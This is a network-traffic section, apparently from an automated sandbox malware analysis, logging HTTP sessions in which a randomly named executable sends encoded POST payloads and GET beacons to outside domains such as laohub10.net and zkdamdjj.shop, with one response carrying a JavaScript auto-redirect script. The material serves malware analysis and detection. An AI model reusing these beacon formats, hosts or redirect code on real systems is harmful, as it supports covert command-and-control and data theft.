                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.54995945.141.156.114806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:10:25.119486094 CET369OUTGET /iuvu/?sVC8z=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5ynY1PA81WB0aqcrP8TCrRqA4T6i/Y0YCRnlTl6YfLJ6nzbiw==&PPP=FHWL56 HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.logidant.xyz
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Nov 20, 2024 21:10:26.470025063 CET691INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Wed, 20 Nov 2024 20:10:26 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 548
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.2.549974202.79.161.151806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:10:32.564551115 CET631OUTPOST /36be/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 206
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.laohub10.net
                                                            Origin: http://www.laohub10.net
                                                            Referer: http://www.laohub10.net/36be/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 64 49 78 36 6f 50 76 73 4d 2b 30 43 6c 59 47 50 47 50 54 78 32 4e 6d 46 75 69 6b 75 41 56 71 4b 63 2b 4a 33 31 7a 49 4c 77 35 31 64 6c 64 42 35 73 4d 36 31 47 50 32 4b 38 72 6f 73 38 45 2b 71 2f 69 79 4a 42 66 34 39 33 41 56 45 70 2f 6a 4c 59 53 79 33 36 4f 7a 30 69 61 62 50 4e 5a 46 36 58 2f 77 46 4d 61 53 6f 58 48 33 54 67 32 66 70 6f 78 71 65 71 53 59 47 35 32 4b 39 74 32 2b 78 43 63 48 68 76 67 2b 4c 4e 73 6d 75 46 47 71 43 49 69 6f 54 4f 32 67 62 6f 71 4a 33 35 38 65 70 2b 75 73 45 31 64 4b 48 4c 71 35 79 42 79 41 71 55 6d 30 7a 36 75 61 44 70 78 55 3d
                                                            Data Ascii: sVC8z=+RW/B6W0fKmadIx6oPvsM+0ClYGPGPTx2NmFuikuAVqKc+J31zILw51dldB5sM61GP2K8ros8E+q/iyJBf493AVEp/jLYSy36Oz0iabPNZF6X/wFMaSoXH3Tg2fpoxqeqSYG52K9t2+xCcHhvg+LNsmuFGqCIioTO2gboqJ358ep+usE1dKHLq5yByAqUm0z6uaDpxU=
                                                            Nov 20, 2024 21:10:33.895478964 CET532INHTTP/1.1 200 OK
                                                            Server: Apache
                                                            Content-Type: text/html; charset=utf-8
                                                            Accept-Ranges: bytes
                                                            Cache-Control: max-age=86400
                                                            Age: 1
                                                            Connection: Close
                                                            Content-Length: 357
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.2.549981202.79.161.151806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:10:35.233187914 CET651OUTPOST /36be/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.laohub10.net
                                                            Origin: http://www.laohub10.net
                                                            Referer: http://www.laohub10.net/36be/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 62 6f 68 36 6b 4a 6e 73 5a 4f 30 44 35 6f 47 50 4a 76 53 32 32 4e 36 46 75 6d 56 6c 42 6e 2b 4b 62 66 35 33 32 78 77 4c 39 5a 31 64 71 39 42 38 69 73 37 33 47 50 79 73 38 75 41 73 38 41 65 71 2f 6e 4f 4a 42 4f 34 2b 30 77 56 47 77 76 6a 4a 63 53 79 33 36 4f 7a 30 69 65 4c 70 4e 64 70 36 55 4f 41 46 4e 37 53 6e 5a 6e 33 55 33 47 66 70 6a 52 71 61 71 53 59 77 35 7a 53 62 74 77 36 78 43 65 66 68 76 31 65 4d 61 38 6d 30 4c 6d 72 67 43 48 59 57 4c 32 34 77 74 49 4d 75 70 39 71 53 2f 59 64 75 76 2f 43 76 59 4b 56 4b 52 68 49 64 46 57 56 61 67 4e 4b 7a 33 6d 41 78 50 42 36 37 69 68 65 45 46 7a 69 34 43 7a 76 48 57 47 33 6b
                                                            Data Ascii: sVC8z=+RW/B6W0fKmaboh6kJnsZO0D5oGPJvS22N6FumVlBn+Kbf532xwL9Z1dq9B8is73GPys8uAs8Aeq/nOJBO4+0wVGwvjJcSy36Oz0ieLpNdp6UOAFN7SnZn3U3GfpjRqaqSYw5zSbtw6xCefhv1eMa8m0LmrgCHYWL24wtIMup9qS/Yduv/CvYKVKRhIdFWVagNKz3mAxPB67iheEFzi4CzvHWG3k
                                                            Nov 20, 2024 21:10:36.618599892 CET532INHTTP/1.1 200 OK
                                                            Server: Apache
                                                            Content-Type: text/html; charset=utf-8
                                                            Accept-Ranges: bytes
                                                            Cache-Control: max-age=86400
                                                            Age: 1
                                                            Connection: Close
                                                            Content-Length: 357
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.2.549988202.79.161.151806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:10:37.903876066 CET1668OUTPOST /36be/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 1242
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.laohub10.net
                                                            Origin: http://www.laohub10.net
                                                            Referer: http://www.laohub10.net/36be/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 62 6f 68 36 6b 4a 6e 73 5a 4f 30 44 35 6f 47 50 4a 76 53 32 32 4e 36 46 75 6d 56 6c 42 6e 47 4b 62 6f 52 33 31 57 63 4c 38 5a 31 64 6a 64 42 39 69 73 37 32 47 50 4b 6f 38 75 46 62 38 43 6d 71 2b 46 32 4a 51 4d 41 2b 76 67 56 47 74 2f 6a 55 59 53 79 59 36 4f 6a 34 69 61 58 70 4e 64 70 36 55 4e 6f 46 4e 71 53 6e 4a 58 33 54 67 32 66 74 6f 78 71 79 71 53 41 67 35 79 6e 6d 74 6a 79 78 44 2b 50 68 6a 68 2b 4d 46 4d 6d 71 47 47 72 47 43 48 64 47 4c 32 55 57 74 4a 34 45 70 36 47 53 2b 63 38 33 71 73 44 30 61 73 52 59 55 41 59 39 59 32 49 39 72 73 36 32 36 68 73 75 43 43 4b 30 30 42 6d 61 4a 79 62 73 5a 55 75 57 53 53 57 45 64 43 45 6f 2b 36 58 30 34 42 33 39 6e 75 4e 56 39 33 41 58 76 41 33 55 33 51 43 43 53 74 78 42 59 36 4b 54 56 4b 4d 35 38 31 7a 4c 68 73 38 46 34 42 30 77 73 53 69 66 4d 76 71 6b 68 43 61 67 75 4f 69 67 77 77 41 79 53 48 66 30 4b 35 4a 71 77 61 76 5a 70 59 68 4b 63 6d 79 54 7a 4b 54 57 78 33 4d 51 54 48 6e 4e 6a 49 32 54 42 67 2b 6d [TRUNCATED]
                                                            Data Ascii: sVC8z=+RW/B6W0fKmaboh6kJnsZO0D5oGPJvS22N6FumVlBnGKboR31WcL8Z1djdB9is72GPKo8uFb8Cmq+F2JQMA+vgVGt/jUYSyY6Oj4iaXpNdp6UNoFNqSnJX3Tg2ftoxqyqSAg5ynmtjyxD+Phjh+MFMmqGGrGCHdGL2UWtJ4Ep6GS+c83qsD0asRYUAY9Y2I9rs626hsuCCK00BmaJybsZUuWSSWEdCEo+6X04B39nuNV93AXvA3U3QCCStxBY6KTVKM581zLhs8F4B0wsSifMvqkhCaguOigwwAySHf0K5JqwavZpYhKcmyTzKTWx3MQTHnNjI2TBg+mk9lg3IAryk6EFMubuvJYay1Ag3fLMuABsYQ4hl8lNQGF7TvjZvkr96kvqSc/h5e1TrjZQwd4FcrA5KLCNsarfa5qmFLqaDhFaqyHc7epcyKR4MSZ688pWyaQN9rRFcaZ0L0/t+8NacAL7h7PIC6xVpW+1yUsgiCZffMqWzbOmPSxFJHVCUUkoXZ65ZSf7417l+2+ZOtCjgHuwjM5V4OGPU1s8dZVKGXf0n+ChT/3Y7jsks1TgHQNWguMCwUDWOi47rVVxJBjUpDPHn3XT586TaHZN4AfmR+uWQMTkk9kfpJjayOt4HjdfDGSFfZsBiGND93JFDBM91mv6IgeGV5lVjj/o8WmxTm5xe/48y8i68Kiw8Xpyad5PmDYiZERyMWytPvhMh+GKkIgQFyLYiPYeUW9RBnjjBWjfhgcX6mSwnSysVCsrkPhW/VHAeAgBlXrwBVQVmEukXjwtcW9bPXd1CowxnPz6bxzzgC7NqqlbZx5GKfi9VK09Gf9OwhUCARvLfgG8VBy3q3QDY+OPivVlu9p+6rfQh5/aRkT6Xl6WVYsa2dUuBACa6pOGVbpvVNSrTkhoVGHisd4Y2W8vvhNiLyGWramj6b5DthvXjGeJBE8SLJowiKFgiqI1Ws9xRkck81TcGY3cWpDtEkvwIHP7hMltBnCosFKwi [TRUNCATED]
                                                            Nov 20, 2024 21:10:39.303628922 CET532INHTTP/1.1 200 OK
                                                            Server: Apache
                                                            Content-Type: text/html; charset=utf-8
                                                            Accept-Ranges: bytes
                                                            Cache-Control: max-age=86400
                                                            Age: 1
                                                            Connection: Close
                                                            Content-Length: 357
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            24192.168.2.549995202.79.161.151806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:10:40.561042070 CET369OUTGET /36be/?sVC8z=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7tD9cl/byRSbJ8t/R3+K3cKRBXN0bJbe4ZjKihmDBlTXN1Q==&PPP=FHWL56 HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.laohub10.net
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Nov 20, 2024 21:10:42.010817051 CET532INHTTP/1.1 200 OK
                                                            Server: Apache
                                                            Content-Type: text/html; charset=utf-8
                                                            Accept-Ranges: bytes
                                                            Cache-Control: max-age=86400
                                                            Age: 1
                                                            Connection: Close
                                                            Content-Length: 357
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.550002104.21.40.167806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:10:47.760278940 CET634OUTPOST /kf1m/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 206
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.zkdamdjj.shop
                                                            Origin: http://www.zkdamdjj.shop
                                                            Referer: http://www.zkdamdjj.shop/kf1m/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 4a 31 63 58 48 65 4e 38 6e 34 79 33 37 51 49 45 50 47 61 42 49 46 48 4c 5a 73 31 35 67 62 67 73 4c 34 74 56 47 5a 4d 30 4c 7a 58 31 48 71 66 70 38 6e 31 66 52 64 52 59 42 4f 7a 39 41 33 4e 44 2f 70 5a 32 6b 30 4a 66 49 53 58 66 63 42 49 71 67 34 5a 74 2b 32 6c 4f 6a 54 6c 4a 4a 4c 77 49 4e 38 63 77 31 33 52 75 73 39 36 51 76 70 2f 7a 35 48 67 42 4b 6a 2b 67 63 36 6a 6f 4f 6e 67 4a 79 63 63 66 61 42 75 43 49 34 53 63 57 43 51 30 36 75 53 36 7a 4f 36 2b 53 44 34 4b 2f 6f 56 67 74 4a 53 38 64 41 56 70 4e 6c 6f 6e 35 62 4f 65 6e 62 46 57 6c 63 38 54 64 67 3d
                                                            Data Ascii: sVC8z=tBXlMSkIxJ8XDJ1cXHeN8n4y37QIEPGaBIFHLZs15gbgsL4tVGZM0LzX1Hqfp8n1fRdRYBOz9A3ND/pZ2k0JfISXfcBIqg4Zt+2lOjTlJJLwIN8cw13Rus96Qvp/z5HgBKj+gc6joOngJyccfaBuCI4ScWCQ06uS6zO6+SD4K/oVgtJS8dAVpNlon5bOenbFWlc8Tdg=


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.550003104.21.40.167806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:10:50.420706987 CET654OUTPOST /kf1m/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.zkdamdjj.shop
                                                            Origin: http://www.zkdamdjj.shop
                                                            Referer: http://www.zkdamdjj.shop/kf1m/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 6f 46 63 4d 6e 69 4e 72 58 34 74 70 72 51 49 4f 76 47 65 42 49 5a 48 4c 59 6f 63 2b 54 2f 67 74 75 63 74 57 45 78 4d 33 4c 7a 58 2b 6e 72 30 30 73 6e 69 66 52 5a 6a 59 44 71 7a 39 45 6e 4e 44 2b 5a 5a 78 58 4d 49 65 59 53 56 58 38 42 4f 6b 41 34 5a 74 2b 32 6c 4f 6a 75 4f 4a 4a 54 77 49 5a 41 63 68 6b 33 57 74 73 39 6c 56 76 70 2f 33 35 48 6b 42 4b 69 72 67 64 57 64 6f 4d 76 67 4a 32 4d 63 65 4f 31 74 52 6f 34 51 44 47 44 62 35 4a 72 34 69 53 6d 58 6a 7a 58 39 52 2f 77 31 68 62 34 34 6d 2f 49 39 36 74 4a 51 33 71 54 35 50 58 36 73 4d 47 4d 4d 4e 4b 32 35 50 45 77 39 31 76 57 62 74 4f 56 49 58 45 45 51 75 31 41 6c
                                                            Data Ascii: sVC8z=tBXlMSkIxJ8XDoFcMniNrX4tprQIOvGeBIZHLYoc+T/gtuctWExM3LzX+nr00snifRZjYDqz9EnND+ZZxXMIeYSVX8BOkA4Zt+2lOjuOJJTwIZAchk3Wts9lVvp/35HkBKirgdWdoMvgJ2MceO1tRo4QDGDb5Jr4iSmXjzX9R/w1hb44m/I96tJQ3qT5PX6sMGMMNK25PEw91vWbtOVIXEEQu1Al


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            27192.168.2.550004104.21.40.167806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:10:53.078188896 CET1671OUTPOST /kf1m/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 1242
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.zkdamdjj.shop
                                                            Origin: http://www.zkdamdjj.shop
                                                            Referer: http://www.zkdamdjj.shop/kf1m/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
